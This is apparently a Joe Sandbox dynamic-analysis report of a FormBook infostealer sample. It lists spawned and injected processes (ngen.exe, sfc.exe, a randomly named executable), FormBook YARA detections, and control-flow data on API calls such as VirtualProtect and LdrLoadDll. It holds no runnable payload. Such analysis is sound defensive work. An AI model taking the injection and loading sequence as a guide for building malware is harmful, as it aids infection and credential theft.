                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:14:04:52
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\notepad.exe
                                                                                                                    Wow64 process (32bit):
                                                                                                                    Commandline:"C:\Windows\System32\notepad.exe"
                                                                                                                    Imagebase:
                                                                                                                    File size:201'216 bytes
                                                                                                                    MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:5
                                                                                                                    Start time:14:04:52
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                                                                                                                    Imagebase:0xab0000
                                                                                                                    File size:144'344 bytes
                                                                                                                    MD5 hash:417D6EA61C097F8DF6FEF2A57F9692DF
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:14:04:52
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
                                                                                                                    Wow64 process (32bit):
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                                                                                                                    Imagebase:
                                                                                                                    File size:144'344 bytes
                                                                                                                    MD5 hash:417D6EA61C097F8DF6FEF2A57F9692DF
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:9
                                                                                                                    Start time:14:04:53
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2060 -s 1572
                                                                                                                    Imagebase:0x7ff708510000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:10
                                                                                                                    Start time:14:04:55
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                    File size:496'640 bytes
                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:11
                                                                                                                    Start time:14:05:06
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe"
                                                                                                                    Imagebase:0xb10000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:12
                                                                                                                    Start time:14:05:07
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\SysWOW64\sfc.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                                                                                                    Imagebase:0xa30000
                                                                                                                    File size:40'448 bytes
                                                                                                                    MD5 hash:4D2662964EF299131D049EC1278BE08B
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:low
                                                                                                                    Has exited:false

                                                                                                                    Target ID:16
                                                                                                                    Start time:14:05:20
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe"
                                                                                                                    Imagebase:0xb10000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:17
                                                                                                                    Start time:14:05:31
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:11.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:31
                                                                                                                      Total number of Limit Nodes:2
                                                                                                                      execution_graph 15470 7ffd9b8a09c8 15473 7ffd9b8a09d1 15470->15473 15471 7ffd9b8a097d FreeConsole 15472 7ffd9b8a099e 15471->15472 15473->15471 15474 7ffd9b8a0a4b 15473->15474 15485 7ffd9b8a05b8 15474->15485 15476 7ffd9b8a0aa4 15477 7ffd9b8a05b8 LoadLibraryA 15476->15477 15478 7ffd9b8a0aed 15477->15478 15479 7ffd9b8a05b8 LoadLibraryA 15478->15479 15480 7ffd9b8a0b02 15479->15480 15481 7ffd9b8a05b8 LoadLibraryA 15480->15481 15482 7ffd9b8a0b6f 15481->15482 15483 7ffd9b8a05b8 LoadLibraryA 15482->15483 15484 7ffd9b8a0b84 15483->15484 15487 7ffd9b8a1050 15485->15487 15486 7ffd9b8a10bf 15486->15476 15487->15486 15488 7ffd9b8a1200 LoadLibraryA 15487->15488 15489 7ffd9b8a1254 15488->15489 15489->15476 15456 7ffd9b8a18b9 15461 7ffd9b8a1050 15456->15461 15458 7ffd9b8a18fa 15459 7ffd9b8a1050 LoadLibraryA 15458->15459 15460 7ffd9b8a192e 15459->15460 15464 7ffd9b8a1066 15461->15464 15462 7ffd9b8a10bf 15462->15458 15463 7ffd9b8a1200 LoadLibraryA 15465 7ffd9b8a1254 15463->15465 15464->15462 15464->15463 15465->15458 15466 7ffd9b8a1654 15467 7ffd9b8a165d VirtualProtect 15466->15467 15469 7ffd9b8a1721 15467->15469

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: d$L_H
                                                                                                                      • API String ID: 0-2890412271
                                                                                                                      • Opcode ID: 2929f90173fa32a77efc3d7f7d0767f822f0e38beed85f303676cd7b8b8a5d7d
                                                                                                                      • Instruction ID: efc315be3506ba6cb0dbb590cace1f9b4ad5d8695d7daf783ab70b589d66195d
                                                                                                                      • Opcode Fuzzy Hash: 2929f90173fa32a77efc3d7f7d0767f822f0e38beed85f303676cd7b8b8a5d7d
                                                                                                                      • Instruction Fuzzy Hash: 64126330A0DA494FE76CDF6894A157177E0EF4A310B1542BAD49EC71ABEE28F8438391

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4W_H
                                                                                                                      • API String ID: 0-1926889702

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: fish
                                                                                                                      • API String ID: 0-1064584243

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID: $
                                                                                                                      • API String ID: 1029625771-3993045852

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807832388.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A
                                                                                                                      • API String ID: 0-3554254475
                                                                                                                      • Opcode ID: 753dc5aed428e0d70ea3069bc009dcbf8214d4bfd3e094092ccd2b7739f7f537
                                                                                                                      • Instruction ID: f059d20810fb161713b5cb66b0af88ef19f717152bb6d41ee434cef53e4b33bd
                                                                                                                      • Opcode Fuzzy Hash: 753dc5aed428e0d70ea3069bc009dcbf8214d4bfd3e094092ccd2b7739f7f537
                                                                                                                      • Instruction Fuzzy Hash: 64626A72A1FB8A4FE765DB6888655A47BE0FF55700F0601FED08DCB0A3DA346946C781

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ccc8c03b189e87bcffeed1e34700dda5e5420b2cae05b8f2bfa7067fe85c309d
                                                                                                                      • Instruction ID: ec7402d57de85fd8041c7181f1a24752ad4d9716c9082386662a51ad96169c6b
                                                                                                                      • Opcode Fuzzy Hash: ccc8c03b189e87bcffeed1e34700dda5e5420b2cae05b8f2bfa7067fe85c309d
                                                                                                                      • Instruction Fuzzy Hash: C271E721B1EB8D4FE799A7B884252F877E1EF9A710F0500BAD04EC31E2DD2C69468751

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1048 7ffd9b8a1654-7ffd9b8a165b 1049 7ffd9b8a1666-7ffd9b8a171f VirtualProtect 1048->1049 1050 7ffd9b8a165d-7ffd9b8a1665 1048->1050 1053 7ffd9b8a1727-7ffd9b8a174f 1049->1053 1054 7ffd9b8a1721 1049->1054 1050->1049 1054->1053
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 652dfdf54e37a270d5adc61e33d98a5e31209fcda2c87ee85fcf0ab7deed26a5
                                                                                                                      • Instruction ID: 4d67a6d536115111a24fba7b647beb1e8c414a8740e3878e51b70a5338e322bc
                                                                                                                      • Opcode Fuzzy Hash: 652dfdf54e37a270d5adc61e33d98a5e31209fcda2c87ee85fcf0ab7deed26a5
                                                                                                                      • Instruction Fuzzy Hash: 7031C530A0CA4D8FDB1CDB989846AF9BBE1EF56321F04426FD059D3292CF646856C791

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1030 7ffd9b8a0901-7ffd9b8a0919 1031 7ffd9b8a091b-7ffd9b8a097c 1030->1031 1032 7ffd9b8a08ad-7ffd9b8a08b4 1030->1032 1042 7ffd9b8a097d-7ffd9b8a099c FreeConsole 1031->1042 1035 7ffd9b8a08b6-7ffd9b8a08d9 1032->1035 1036 7ffd9b8a08d2-7ffd9b8a08d9 1032->1036 1037 7ffd9b8a08e0-7ffd9b8a08fc 1035->1037 1036->1037 1044 7ffd9b8a099e 1042->1044 1045 7ffd9b8a09a4-7ffd9b8a09c0 1042->1045 1044->1045
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleFree
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 771614528-0
                                                                                                                      • Opcode ID: 8079c1918c2efb9037f0f78bbdc2024989f726ebbff1afcbaec60ece2739d75c
                                                                                                                      • Instruction ID: fb64e03e02e52d162d1bdf5f0802f4176928af1c8a6439e9685f225a14acfb3e
                                                                                                                      • Opcode Fuzzy Hash: 8079c1918c2efb9037f0f78bbdc2024989f726ebbff1afcbaec60ece2739d75c
                                                                                                                      • Instruction Fuzzy Hash: 15319631A1CB0C8FDB68EBA8D455BE9B7E0EF59310F00416ED05EC3296DE75A846CB51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807832388.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c80b3bb781cc5f74cf47063cf6cb08af24de1f934fa894cbd025118b777d01c4
                                                                                                                      • Instruction ID: ceeea8c39f4a9159001151a0fd7d8863168c29fa0876cf03730746ad31c15ea2
                                                                                                                      • Opcode Fuzzy Hash: c80b3bb781cc5f74cf47063cf6cb08af24de1f934fa894cbd025118b777d01c4
                                                                                                                      • Instruction Fuzzy Hash: F2222931A1EBDE4FD766DB7488655A47BE1FF56304B0A01FEC089CB0A3DA38A946C741
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807832388.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 42b727af06a1fa14f30a72731c04aeb881ce5ca0904928ef208513398df20167
                                                                                                                      • Instruction ID: f90b5d6a075bd81d19350f932ee3a2bc049b7bc5560037db6f2c30eb7be97ab6
                                                                                                                      • Opcode Fuzzy Hash: 42b727af06a1fa14f30a72731c04aeb881ce5ca0904928ef208513398df20167
                                                                                                                      • Instruction Fuzzy Hash: 47612831A1EBCD4FD756DB7488659A47BF1EF1A304B0A01EBC04ACB1A7DE28A846C741

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.5%
                                                                                                                      Dynamic/Decrypted Code Coverage:5.1%
                                                                                                                      Signature Coverage:8.8%
                                                                                                                      Total number of Nodes:136
                                                                                                                      Total number of Limit Nodes:12

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 146 417363-41737f 147 417387-41738c 146->147 148 417382 call 42da13 146->148 149 417392-4173a0 call 42df33 147->149 150 41738e-417391 147->150 148->147 153 4173b0-4173c1 call 42c3d3 149->153 154 4173a2-4173ad call 42e1d3 149->154 159 4173c3-4173d7 LdrLoadDll 153->159 160 4173da-4173dd 153->160 154->153 159->160
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004173D5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 42827f6d4e147cc66cda343915524e04a3ed7cc4cfed2bc2c8491ec10588e454
                                                                                                                      • Instruction ID: 348c565881aa1d8816b8c73a56510b337d58f260962ee2485de5f516c67fb9f8
                                                                                                                      • Opcode Fuzzy Hash: 42827f6d4e147cc66cda343915524e04a3ed7cc4cfed2bc2c8491ec10588e454
                                                                                                                      • Instruction Fuzzy Hash: 71015EB1E0020DABDF10DAE1DC42FDEB3B89B54304F0081AAED1897240F674EB54CB95

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 182 42ae83-42aeb9 call 4049f3 call 42bf13 NtClose
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 47efae5147df12e2a290532262f55778ee760547e7d53fcb4626249dd9ba2729
                                                                                                                      • Instruction ID: 39cc2db95d2c1e32b0c89d8faf5bffadc60fb7301eef618929bcda045d4bf150
                                                                                                                      • Opcode Fuzzy Hash: 47efae5147df12e2a290532262f55778ee760547e7d53fcb4626249dd9ba2729
                                                                                                                      • Instruction Fuzzy Hash: ADE08C76200224BBD620EA5ADC02F9B776DDFC5754F40852AFB08A7282C775BA11CBF4

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 199 57735c0-57735cc LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: a28201fbcb591597046f07a3b8406059d3ff68471fbd69c32b359b1337bcf308
                                                                                                                      • Instruction ID: c83fd34578e66cbe155d682c8d1c08174803478ed011ef1d584702baeff6c285
                                                                                                                      • Opcode Fuzzy Hash: a28201fbcb591597046f07a3b8406059d3ff68471fbd69c32b359b1337bcf308
                                                                                                                      • Instruction Fuzzy Hash: EF90023264550402D10071584594716101687E0311FE5C861A042457CD87958A5175A3

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 198 5772df0-5772dfc LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5e6be231a41f35578fd596f1d1f1069f0ca77e2a00f3c40c32a56cb49c1530b7
                                                                                                                      • Instruction ID: 6751ddff0f31c4bb5b02c36fd4829a427871407abae86c30091645efb21a9279
                                                                                                                      • Opcode Fuzzy Hash: 5e6be231a41f35578fd596f1d1f1069f0ca77e2a00f3c40c32a56cb49c1530b7
                                                                                                                      • Instruction Fuzzy Hash: 6190023224140413D11171584584717001A87E0351FD5C862A042456CD96568A52B123

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 197 5772c70-5772c7c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 196 5772b60-5772b6c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 00413A2A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 16 4139ac-4139c5 17 4139cd-413a1d call 42d7c3 call 417363 call 404963 call 424183 16->17 18 4139c8 call 42cdb3 16->18 27 413a3d-413a43 17->27 28 413a1f-413a2e PostThreadMessageW 17->28 18->17 28->27 29 413a30-413a3a 28->29 29->27
